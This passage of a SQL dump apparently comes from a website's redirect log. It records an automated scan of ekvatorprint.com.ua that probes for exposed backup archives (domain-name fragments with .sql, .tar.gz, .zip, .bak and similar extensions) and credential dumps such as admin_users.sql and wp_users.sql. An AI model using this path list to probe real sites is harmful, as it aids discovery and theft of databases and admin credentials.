00:00:00',301),(22315,'https://ekvatorprint.com.ua/m.ua.rar',NULL,'','',2,0,'2022-03-23 11:22:45','0000-00-00 00:00:00',301),(22316,'https://ekvatorprint.com.ua/m.ua.bak',NULL,'','',1,0,'2022-03-23 11:22:45','0000-00-00 00:00:00',301),(22317,'https://ekvatorprint.com.ua/m.ua.zip',NULL,'','',1,0,'2022-03-23 11:22:45','0000-00-00 00:00:00',301),(22318,'https://ekvatorprint.com.ua/m.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:46','0000-00-00 00:00:00',301),(22319,'https://ekvatorprint.com.ua/m.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:46','0000-00-00 00:00:00',301),(22320,'https://ekvatorprint.com.ua/m.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:46','0000-00-00 00:00:00',301),(22321,'https://ekvatorprint.com.ua/m.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:47','0000-00-00 00:00:00',301),(22322,'https://ekvatorprint.com.ua/m.ua.7z',NULL,'','',1,0,'2022-03-23 11:22:47','0000-00-00 00:00:00',301),(22323,'https://ekvatorprint.com.ua/m.ua.gz',NULL,'','',1,0,'2022-03-23 11:22:47','0000-00-00 00:00:00',301),(22324,'https://ekvatorprint.com.ua/om.ua.sql',NULL,'','',1,0,'2022-03-23 11:22:48','0000-00-00 00:00:00',301),(22325,'https://ekvatorprint.com.ua/om.ua.tar',NULL,'','',1,0,'2022-03-23 11:22:48','0000-00-00 00:00:00',301),(22326,'https://ekvatorprint.com.ua/om.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:48','0000-00-00 00:00:00',301),(22327,'https://ekvatorprint.com.ua/om.ua.bz2',NULL,'','',1,0,'2022-03-23 11:22:48','0000-00-00 00:00:00',301),(22328,'https://ekvatorprint.com.ua/om.ua.rar',NULL,'','',2,0,'2022-03-23 11:22:49','0000-00-00 00:00:00',301),(22329,'https://ekvatorprint.com.ua/om.ua.bak',NULL,'','',1,0,'2022-03-23 11:22:49','0000-00-00 00:00:00',301),(22330,'https://ekvatorprint.com.ua/om.ua.zip',NULL,'','',1,0,'2022-03-23 11:22:49','0000-00-00 00:00:00',301),(22331,'https://ekvatorprint.com.ua/om.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:50','0000-00-00 00:00:00',301),(22332,'https://ekvatorprint.com.ua/om.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:50','0000-00-00 00:00:00',301),(22333,'https://ekvatorprint.com.ua/om.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:50','0000-00-00 00:00:00',301),(22334,'https://ekvatorprint.com.ua/om.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:50','0000-00-00 00:00:00',301),(22335,'https://ekvatorprint.com.ua/om.ua.7z',NULL,'','',1,0,'2022-03-23 11:22:51','0000-00-00 00:00:00',301),(22336,'https://ekvatorprint.com.ua/om.ua.gz',NULL,'','',1,0,'2022-03-23 11:22:51','0000-00-00 00:00:00',301),(22337,'https://ekvatorprint.com.ua/com.ua.sql',NULL,'','',1,0,'2022-03-23 11:22:51','0000-00-00 00:00:00',301),(22338,'https://ekvatorprint.com.ua/com.ua.tar',NULL,'','',1,0,'2022-03-23 11:22:52','0000-00-00 00:00:00',301),(22339,'https://ekvatorprint.com.ua/com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:52','0000-00-00 00:00:00',301),(22340,'https://ekvatorprint.com.ua/com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:22:52','0000-00-00 00:00:00',301),(22341,'https://ekvatorprint.com.ua/com.ua.rar',NULL,'','',2,0,'2022-03-23 11:22:53','0000-00-00 00:00:00',301),(22342,'https://ekvatorprint.com.ua/com.ua.bak',NULL,'','',1,0,'2022-03-23 11:22:53','0000-00-00 00:00:00',301),(22343,'https://ekvatorprint.com.ua/com.ua.zip',NULL,'','',1,0,'2022-03-23 11:22:53','0000-00-00 00:00:00',301),(22344,'https://ekvatorprint.com.ua/com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:53','0000-00-00 00:00:00',301),(22345,'https://ekvatorprint.com.ua/com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:54','0000-00-00 00:00:00',301),(22346,'https://ekvatorprint.com.ua/com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:54','0000-00-00 00:00:00',301),(22347,'https://ekvatorprint.com.ua/com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:54','0000-00-00 00:00:00',301),(22348,'https://ekvatorprint.com.ua/com.ua.7z',NULL,'','',1,0,'2022-03-23 11:22:55','0000-00-00 00:00:00',301),(22349,'https://ekvatorprint.com.ua/com.ua.gz',NULL,'','',1,0,'2022-03-23 11:22:55','0000-00-00 00:00:00',301),(22350,'https://ekvatorprint.com.ua/.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:22:55','0000-00-00 00:00:00',301),(22351,'https://ekvatorprint.com.ua/.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:22:56','0000-00-00 00:00:00',301),(22352,'https://ekvatorprint.com.ua/.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:56','0000-00-00 00:00:00',301),(22353,'https://ekvatorprint.com.ua/.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:22:56','0000-00-00 00:00:00',301),(22354,'https://ekvatorprint.com.ua/.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:22:56','0000-00-00 00:00:00',301),(22355,'https://ekvatorprint.com.ua/.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:22:57','0000-00-00 00:00:00',301),(22356,'https://ekvatorprint.com.ua/.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:22:57','0000-00-00 00:00:00',301),(22357,'https://ekvatorprint.com.ua/.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:22:57','0000-00-00 00:00:00',301),(22358,'https://ekvatorprint.com.ua/.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:22:57','0000-00-00 00:00:00',301),(22359,'https://ekvatorprint.com.ua/.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:58','0000-00-00 00:00:00',301),(22360,'https://ekvatorprint.com.ua/.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:22:58','0000-00-00 00:00:00',301),(22361,'https://ekvatorprint.com.ua/.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:22:58','0000-00-00 00:00:00',301),(22362,'https://ekvatorprint.com.ua/.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:22:59','0000-00-00 00:00:00',301),(22363,'https://ekvatorprint.com.ua/t.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:22:59','0000-00-00 00:00:00',301),(22364,'https://ekvatorprint.com.ua/t.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:22:59','0000-00-00 00:00:00',301),(22365,'https://ekvatorprint.com.ua/t.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:22:59','0000-00-00 00:00:00',301),(22366,'https://ekvatorprint.com.ua/t.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:00','0000-00-00 00:00:00',301),(22367,'https://ekvatorprint.com.ua/t.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:00','0000-00-00 00:00:00',301),(22368,'https://ekvatorprint.com.ua/t.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:00','0000-00-00 00:00:00',301),(22369,'https://ekvatorprint.com.ua/t.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:00','0000-00-00 00:00:00',301),(22370,'https://ekvatorprint.com.ua/t.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:01','0000-00-00 00:00:00',301),(22371,'https://ekvatorprint.com.ua/t.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:01','0000-00-00 00:00:00',301),(22372,'https://ekvatorprint.com.ua/t.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:01','0000-00-00 00:00:00',301),(22373,'https://ekvatorprint.com.ua/t.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:02','0000-00-00 00:00:00',301),(22374,'https://ekvatorprint.com.ua/t.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:02','0000-00-00 00:00:00',301),(22375,'https://ekvatorprint.com.ua/t.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:03','0000-00-00 00:00:00',301),(22376,'https://ekvatorprint.com.ua/nt.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:03','0000-00-00 00:00:00',301),(22377,'https://ekvatorprint.com.ua/nt.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:03','0000-00-00 00:00:00',301),(22378,'https://ekvatorprint.com.ua/nt.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:04','0000-00-00 00:00:00',301),(22379,'https://ekvatorprint.com.ua/nt.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:04','0000-00-00 00:00:00',301),(22380,'https://ekvatorprint.com.ua/nt.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:04','0000-00-00 00:00:00',301),(22381,'https://ekvatorprint.com.ua/nt.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:04','0000-00-00 00:00:00',301),(22382,'https://ekvatorprint.com.ua/nt.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:05','0000-00-00 00:00:00',301),(22383,'https://ekvatorprint.com.ua/nt.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:05','0000-00-00 00:00:00',301),(22384,'https://ekvatorprint.com.ua/nt.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:05','0000-00-00 00:00:00',301),(22385,'https://ekvatorprint.com.ua/nt.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:05','0000-00-00 00:00:00',301),(22386,'https://ekvatorprint.com.ua/nt.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:06','0000-00-00 00:00:00',301),(22387,'https://ekvatorprint.com.ua/nt.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:06','0000-00-00 00:00:00',301),(22388,'https://ekvatorprint.com.ua/nt.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:06','0000-00-00 00:00:00',301),(22389,'https://ekvatorprint.com.ua/int.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:07','0000-00-00 00:00:00',301),(22390,'https://ekvatorprint.com.ua/int.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:07','0000-00-00 00:00:00',301),(22391,'https://ekvatorprint.com.ua/int.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:07','0000-00-00 00:00:00',301),(22392,'https://ekvatorprint.com.ua/int.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:07','0000-00-00 00:00:00',301),(22393,'https://ekvatorprint.com.ua/int.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:08','0000-00-00 00:00:00',301),(22394,'https://ekvatorprint.com.ua/int.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:08','0000-00-00 00:00:00',301),(22395,'https://ekvatorprint.com.ua/int.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:08','0000-00-00 00:00:00',301),(22396,'https://ekvatorprint.com.ua/int.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:08','0000-00-00 00:00:00',301),(22397,'https://ekvatorprint.com.ua/int.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:09','0000-00-00 00:00:00',301),(22398,'https://ekvatorprint.com.ua/int.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:09','0000-00-00 00:00:00',301),(22399,'https://ekvatorprint.com.ua/int.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:09','0000-00-00 00:00:00',301),(22400,'https://ekvatorprint.com.ua/int.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:10','0000-00-00 00:00:00',301),(22401,'https://ekvatorprint.com.ua/int.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:10','0000-00-00 00:00:00',301),(22402,'https://ekvatorprint.com.ua/rint.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:10','0000-00-00 00:00:00',301),(22403,'https://ekvatorprint.com.ua/rint.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:10','0000-00-00 00:00:00',301),(22404,'https://ekvatorprint.com.ua/rint.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:11','0000-00-00 00:00:00',301),(22405,'https://ekvatorprint.com.ua/rint.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:11','0000-00-00 00:00:00',301),(22406,'https://ekvatorprint.com.ua/rint.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:11','0000-00-00 00:00:00',301),(22407,'https://ekvatorprint.com.ua/rint.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:11','0000-00-00 00:00:00',301),(22408,'https://ekvatorprint.com.ua/rint.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:12','0000-00-00 00:00:00',301),(22409,'https://ekvatorprint.com.ua/rint.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:12','0000-00-00 00:00:00',301),(22410,'https://ekvatorprint.com.ua/rint.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:12','0000-00-00 00:00:00',301),(22411,'https://ekvatorprint.com.ua/rint.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:13','0000-00-00 00:00:00',301),(22412,'https://ekvatorprint.com.ua/rint.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:13','0000-00-00 00:00:00',301),(22413,'https://ekvatorprint.com.ua/rint.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:13','0000-00-00 00:00:00',301),(22414,'https://ekvatorprint.com.ua/rint.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:13','0000-00-00 00:00:00',301),(22415,'https://ekvatorprint.com.ua/print.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:14','0000-00-00 00:00:00',301),(22416,'https://ekvatorprint.com.ua/print.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:14','0000-00-00 00:00:00',301),(22417,'https://ekvatorprint.com.ua/print.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:14','0000-00-00 00:00:00',301),(22418,'https://ekvatorprint.com.ua/print.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:15','0000-00-00 00:00:00',301),(22419,'https://ekvatorprint.com.ua/print.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:15','0000-00-00 00:00:00',301),(22420,'https://ekvatorprint.com.ua/print.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:15','0000-00-00 00:00:00',301),(22421,'https://ekvatorprint.com.ua/print.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:15','0000-00-00 00:00:00',301),(22422,'https://ekvatorprint.com.ua/print.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:16','0000-00-00 00:00:00',301),(22423,'https://ekvatorprint.com.ua/print.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:16','0000-00-00 00:00:00',301),(22424,'https://ekvatorprint.com.ua/print.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:17','0000-00-00 00:00:00',301),(22425,'https://ekvatorprint.com.ua/print.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:17','0000-00-00 00:00:00',301),(22426,'https://ekvatorprint.com.ua/print.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:18','0000-00-00 00:00:00',301),(22427,'https://ekvatorprint.com.ua/print.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:18','0000-00-00 00:00:00',301),(22428,'https://ekvatorprint.com.ua/rprint.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:18','0000-00-00 00:00:00',301),(22429,'https://ekvatorprint.com.ua/rprint.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:18','0000-00-00 00:00:00',301),(22430,'https://ekvatorprint.com.ua/rprint.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:19','0000-00-00 00:00:00',301),(22431,'https://ekvatorprint.com.ua/rprint.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:19','0000-00-00 00:00:00',301),(22432,'https://ekvatorprint.com.ua/rprint.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:19','0000-00-00 00:00:00',301),(22433,'https://ekvatorprint.com.ua/rprint.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:19','0000-00-00 00:00:00',301),(22434,'https://ekvatorprint.com.ua/rprint.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:20','0000-00-00 00:00:00',301),(22435,'https://ekvatorprint.com.ua/rprint.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:20','0000-00-00 00:00:00',301),(22436,'https://ekvatorprint.com.ua/rprint.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:20','0000-00-00 00:00:00',301),(22437,'https://ekvatorprint.com.ua/rprint.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:20','0000-00-00 00:00:00',301),(22438,'https://ekvatorprint.com.ua/rprint.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:21','0000-00-00 00:00:00',301),(22439,'https://ekvatorprint.com.ua/rprint.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:21','0000-00-00 00:00:00',301),(22440,'https://ekvatorprint.com.ua/rprint.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:21','0000-00-00 00:00:00',301),(22441,'https://ekvatorprint.com.ua/orprint.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:22','0000-00-00 00:00:00',301),(22442,'https://ekvatorprint.com.ua/orprint.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:22','0000-00-00 00:00:00',301),(22443,'https://ekvatorprint.com.ua/orprint.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:22','0000-00-00 00:00:00',301),(22444,'https://ekvatorprint.com.ua/orprint.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:22','0000-00-00 00:00:00',301),(22445,'https://ekvatorprint.com.ua/orprint.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:23','0000-00-00 00:00:00',301),(22446,'https://ekvatorprint.com.ua/orprint.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:23','0000-00-00 00:00:00',301),(22447,'https://ekvatorprint.com.ua/orprint.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:23','0000-00-00 00:00:00',301),(22448,'https://ekvatorprint.com.ua/orprint.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:23','0000-00-00 00:00:00',301),(22449,'https://ekvatorprint.com.ua/orprint.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:24','0000-00-00 00:00:00',301),(22450,'https://ekvatorprint.com.ua/orprint.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:24','0000-00-00 00:00:00',301),(22451,'https://ekvatorprint.com.ua/orprint.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:24','0000-00-00 00:00:00',301),(22452,'https://ekvatorprint.com.ua/orprint.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:25','0000-00-00 00:00:00',301),(22453,'https://ekvatorprint.com.ua/orprint.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:25','0000-00-00 00:00:00',301),(22454,'https://ekvatorprint.com.ua/torprint.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:25','0000-00-00 00:00:00',301),(22455,'https://ekvatorprint.com.ua/torprint.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:26','0000-00-00 00:00:00',301),(22456,'https://ekvatorprint.com.ua/torprint.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:26','0000-00-00 00:00:00',301),(22457,'https://ekvatorprint.com.ua/torprint.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:26','0000-00-00 00:00:00',301),(22458,'https://ekvatorprint.com.ua/torprint.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:26','0000-00-00 00:00:00',301),(22459,'https://ekvatorprint.com.ua/torprint.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:27','0000-00-00 00:00:00',301),(22460,'https://ekvatorprint.com.ua/torprint.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:27','0000-00-00 00:00:00',301),(22461,'https://ekvatorprint.com.ua/torprint.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:27','0000-00-00 00:00:00',301),(22462,'https://ekvatorprint.com.ua/torprint.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:27','0000-00-00 00:00:00',301),(22463,'https://ekvatorprint.com.ua/torprint.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:28','0000-00-00 00:00:00',301),(22464,'https://ekvatorprint.com.ua/torprint.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:28','0000-00-00 00:00:00',301),(22465,'https://ekvatorprint.com.ua/torprint.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:28','0000-00-00 00:00:00',301),(22466,'https://ekvatorprint.com.ua/torprint.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:29','0000-00-00 00:00:00',301),(22467,'https://ekvatorprint.com.ua/atorprint.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:29','0000-00-00 00:00:00',301),(22468,'https://ekvatorprint.com.ua/atorprint.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:29','0000-00-00 00:00:00',301),(22469,'https://ekvatorprint.com.ua/atorprint.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:29','0000-00-00 00:00:00',301),(22470,'https://ekvatorprint.com.ua/atorprint.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:30','0000-00-00 00:00:00',301),(22471,'https://ekvatorprint.com.ua/atorprint.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:30','0000-00-00 00:00:00',301),(22472,'https://ekvatorprint.com.ua/atorprint.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:30','0000-00-00 00:00:00',301),(22473,'https://ekvatorprint.com.ua/atorprint.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:30','0000-00-00 00:00:00',301),(22474,'https://ekvatorprint.com.ua/atorprint.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:31','0000-00-00 00:00:00',301),(22475,'https://ekvatorprint.com.ua/atorprint.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:31','0000-00-00 00:00:00',301),(22476,'https://ekvatorprint.com.ua/atorprint.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:31','0000-00-00 00:00:00',301),(22477,'https://ekvatorprint.com.ua/atorprint.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:31','0000-00-00 00:00:00',301),(22478,'https://ekvatorprint.com.ua/atorprint.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:32','0000-00-00 00:00:00',301),(22479,'https://ekvatorprint.com.ua/atorprint.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:32','0000-00-00 00:00:00',301),(22480,'https://ekvatorprint.com.ua/vatorprint.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:32','0000-00-00 00:00:00',301),(22481,'https://ekvatorprint.com.ua/vatorprint.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:33','0000-00-00 00:00:00',301),(22482,'https://ekvatorprint.com.ua/vatorprint.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:33','0000-00-00 00:00:00',301),(22483,'https://ekvatorprint.com.ua/vatorprint.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:33','0000-00-00 00:00:00',301),(22484,'https://ekvatorprint.com.ua/vatorprint.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:33','0000-00-00 00:00:00',301),(22485,'https://ekvatorprint.com.ua/vatorprint.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:34','0000-00-00 00:00:00',301),(22486,'https://ekvatorprint.com.ua/vatorprint.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:34','0000-00-00 00:00:00',301),(22487,'https://ekvatorprint.com.ua/vatorprint.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:34','0000-00-00 00:00:00',301),(22488,'https://ekvatorprint.com.ua/vatorprint.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:34','0000-00-00 00:00:00',301),(22489,'https://ekvatorprint.com.ua/vatorprint.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:35','0000-00-00 00:00:00',301),(22490,'https://ekvatorprint.com.ua/vatorprint.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:35','0000-00-00 00:00:00',301),(22491,'https://ekvatorprint.com.ua/vatorprint.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:35','0000-00-00 00:00:00',301),(22492,'https://ekvatorprint.com.ua/vatorprint.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:36','0000-00-00 00:00:00',301),(22493,'https://ekvatorprint.com.ua/kvatorprint.com.ua.sql',NULL,'','',1,0,'2022-03-23 11:23:36','0000-00-00 00:00:00',301),(22494,'https://ekvatorprint.com.ua/kvatorprint.com.ua.tar',NULL,'','',1,0,'2022-03-23 11:23:36','0000-00-00 00:00:00',301),(22495,'https://ekvatorprint.com.ua/kvatorprint.com.ua.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:36','0000-00-00 00:00:00',301),(22496,'https://ekvatorprint.com.ua/kvatorprint.com.ua.bz2',NULL,'','',1,0,'2022-03-23 11:23:37','0000-00-00 00:00:00',301),(22497,'https://ekvatorprint.com.ua/kvatorprint.com.ua.rar',NULL,'','',2,0,'2022-03-23 11:23:37','0000-00-00 00:00:00',301),(22498,'https://ekvatorprint.com.ua/kvatorprint.com.ua.bak',NULL,'','',1,0,'2022-03-23 11:23:37','0000-00-00 00:00:00',301),(22499,'https://ekvatorprint.com.ua/kvatorprint.com.ua.zip',NULL,'','',1,0,'2022-03-23 11:23:37','0000-00-00 00:00:00',301),(22500,'https://ekvatorprint.com.ua/kvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2022-03-23 11:23:38','0000-00-00 00:00:00',301),(22501,'https://ekvatorprint.com.ua/kvatorprint.com.ua.sql.zip',NULL,'','',1,0,'2022-03-23 11:23:38','0000-00-00 00:00:00',301),(22502,'https://ekvatorprint.com.ua/kvatorprint.com.ua.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:38','0000-00-00 00:00:00',301),(22503,'https://ekvatorprint.com.ua/kvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2022-03-23 11:23:38','0000-00-00 00:00:00',301),(22504,'https://ekvatorprint.com.ua/kvatorprint.com.ua.7z',NULL,'','',1,0,'2022-03-23 11:23:39','0000-00-00 00:00:00',301),(22505,'https://ekvatorprint.com.ua/kvatorprint.com.ua.gz',NULL,'','',1,0,'2022-03-23 11:23:39','0000-00-00 00:00:00',301),(22506,'https://ekvatorprint.com.ua/admin_users.sql',NULL,'','',1,0,'2022-03-23 11:23:43','0000-00-00 00:00:00',301),(22507,'https://ekvatorprint.com.ua/mg_admin_users.sql',NULL,'','',1,0,'2022-03-23 11:23:43','0000-00-00 00:00:00',301),(22508,'https://ekvatorprint.com.ua/mage_admin_users.sql',NULL,'','',1,0,'2022-03-23 11:23:44','0000-00-00 00:00:00',301),(22509,'https://ekvatorprint.com.ua/m_admin_users.sql',NULL,'','',1,0,'2022-03-23 11:23:44','0000-00-00 00:00:00',301),(22510,'https://ekvatorprint.com.ua/wp_users.sql',NULL,'','',1,0,'2022-03-23 11:23:44','0000-00-00 00:00:00',301),(22511,'https://ekvatorprint.com.ua/ps_employee.sql',NULL,'','',1,0,'2022-03-23 11:23:44','0000-00-00 00:00:00',301),(22512,'https://ekvatorprint.com.ua/administrators.sql',NULL,'','',1,0,'2022-03-23 11:23:45','0000-00-00 00:00:00',301),(22513,'https://ekvatorprint.com.ua/admins.sql',NULL,'','',1,0,'2022-03-23 11:23:45','0000-00-00 00:00:00',301),(22514,'https://ekvatorprint.com.ua/users.sql',NULL,'','',1,0,'2022-03-23 11:23:45','0000-00-00 00:00:00',301),(22515,'https://ekvatorprint.com.ua/site_users.sql',NULL,'','',1,0,'2022-03-23 11:23:45','0000-00-00 00:00:00',301),(22516,'https://ekvatorprint.com.ua/at.sql',NULL,'','',1,0,'2022-03-23 11:23:53','0000-00-00 00:00:00',301),(22517,'https://ekvatorprint.com.ua/at.tar',NULL,'','',1,0,'2022-03-23 11:23:53','0000-00-00 00:00:00',301),(22518,'https://ekvatorprint.com.ua/at.tar.gz',NULL,'','',1,0,'2022-03-23 11:23:53','0000-00-00 00:00:00',301),(22519,'https://ekvatorprint.com.ua/at.bz2',NULL,'','',1,0,'2022-03-23 11:23:54','0000-00-00 00:00:00',301),(22520,'https://ekvatorprint.com.ua/at.rar',NULL,'','',2,0,'2022-03-23 11:23:54','0000-00-00 00:00:00',301),(22521,'https://ekvatorprint.com.ua/at.bak',NULL,'','',1,0,'2022-03-23 11:23:54','0000-00-00 00:00:00',301),(22522,'https://ekvatorprint.com.ua/at.zip',NULL,'','',1,0,'2022-03-23 11:23:54','0000-00-00 